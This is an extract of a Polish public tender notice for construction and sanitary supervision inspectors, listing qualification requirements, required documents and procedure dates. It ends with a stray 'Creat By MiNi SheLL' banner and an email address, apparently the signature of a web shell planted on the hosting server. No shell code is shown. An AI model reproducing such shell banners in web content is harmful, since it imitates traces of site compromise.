Wykonawca wykazał, że dysponuje lub będzie dysponował przy wykonywaniu zamówienia, osobami, które skieruje do realizacji zamówienia (po jednej osobie na każdą z wymienionych funkcji) tj. które będą pełniły funkcję inspektora nadzoru w następujących branżach:<br/>a)	Inspektora nadzoru w branży konstrukcyjno – budowlanej, którego zgodnie z art. 27 ustawy - Prawo budowlane, wyznacza się na Koordynatora Zespołu, posiadającej:<br/><br/>	uprawnienia budowlane w specjalności konstrukcyjno–budowlanej bez ograniczeń, uprawniające do nadzorowania i kontrolowania budowy i robót lub uprawnienia równoważne, która w dniu podpisania umowy będzie członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą Prawo budowlane oraz ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa; <br/>	posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora nadzoru dla robót budowlanych bądź w kierowaniu robotami budowlanymi jako kierownik budowy lub kierownik robót; <br/><br/> b) Inspektora nadzoru w branży sanitarnej, posiadającej:<br/><br/>	uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych bez ograniczeń, uprawniające do nadzorowania i kontrolowania budowy i robót w tej specjalności lub uprawnienia równoważne, która w dniu podpisania umowy będzie członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą Prawo budowlane oraz ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa,<br/>	posiadającą minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora nadzoru dla robót instalacyjnych w branży sanitarnej bądź w kierowaniu robotami instalacyjnymi jako kierownik budowy lub kierownik robót. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia z postępowania o udzielenie zamówienia<br/>publicznego:<br/> 1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (tekst jednolity Dz. U. z 2021r. poz. poz. 275) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ.<br/><br/> 2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – o ile Wykonawca nie wskazał w złożonym wraz z ofertą oświadczeniu, o którym mowa w art. 125 ust. 1, danych umożliwiających dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu o udzielenie zamówienia publicznego: <br/><br/> wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu wg załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać:1) oświadczenie Wykonawcy, o którym mowa w Rozdziale VII pkt 1 SWZ -<br/>wg załącznika nr 3 do SWZ – potwierdzające brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu.<br/>Jeżeli dotyczy – również w.w. oświadczenia<br/>- każdego z Wykonawców spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - w zakresie potwierdzenia braku podstaw wykluczenia Wykonawcy oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu,<br/>- podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w postępowaniu - w zakresie braku podstaw wykluczenia podwykonawcy,<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienia, będzie dysponował<br/>niezbędnymi zasobami tego podmiotu oraz jego oświadczenia w zakresie potwierdzenia braku<br/>podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu w zakresie, w jakim<br/>podmiot udostępnia swoje zasoby Wykonawcy (jeżeli dotyczy) – proponowana treść<br/>zobowiązania stanowi załącznik nr 6 do SWZ<br/>3) dokumenty, z których wynika prawo do podpisania oferty. Zgodnie z § 13 ust. 1<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii - w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania, zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru.<br/>4) jeśli umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania umowy,<br/>5) w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (np. konsorcjum), do oferty powinno zostać załączone pełnomocnictwo dla<br/>ustanowionego pełnomocnika do reprezentowania ich w postępowaniu, uprawniające do<br/>złożenia oferty w ich imieniu. Pełnomocnictwo załączone do oferty, powinno zawierać w<br/>szczególności:<br/>a) wskazanie postępowania o zamówienie publiczne, którego dotyczy,<br/>b) mocodawców tj. wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby,<br/>c) osobę ustanowionego pełnomocnika<br/>d) jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony<br/>(zakres umocowania)<br/>Podpisy na pełnomocnictwie muszą zostać złożone przez osoby uprawnione do składania<br/>oświadczeń woli, wymienione we właściwym rejestrze.<br/>5) oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (dotyczy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przypadku, o którym mowa<br/>w art. 117 ust. 3 ustawy Pzp),<br/>6) oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika musi być podpisany przez wszystkich Wykonawców<br/>ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/>2. Zamawiający będzie sprawdzać, czy nie zachodzą, wobec każdego z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, podstawy wykluczenia, o których mowa w art. 108<br/>ust.1 i art. 109 ust. 1 pkt 4),5) i 7) ustawy Pzp oraz spełnianie warunków udziału w postępowaniu<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wobec powyższego, oświadczenie o którym mowa w rozdz. VII pkt 1 składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to tymczasowo<br/>potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, o<br/>których mowa w rozdz. VII pkt 3.A ppkt 1), 2) SWZ, składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidywane zmiany postanowień umowy zostały szczegółowo opisane w załączniku nr 2 do SWZ -w paragrafie 16 projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/asp_krakow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> * przez obiekt zabytkowy, (dla potrzeb niniejszego postepowania), należy rozumieć obiekty wpisane do rejestru zabytków, bądź zlokalizowane w układzie urbanistycznym wpisanym do rejestru zabytków lub wpisane do gminnej ewidencji zabytków.<br/>Kryteria pozacenowe dotyczą doświadczenia osób dedykowanych do pełnienia funkcji Inspektora nadzoru, które to doświadczenie, ma istotny wpływ na jakość wykonania zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com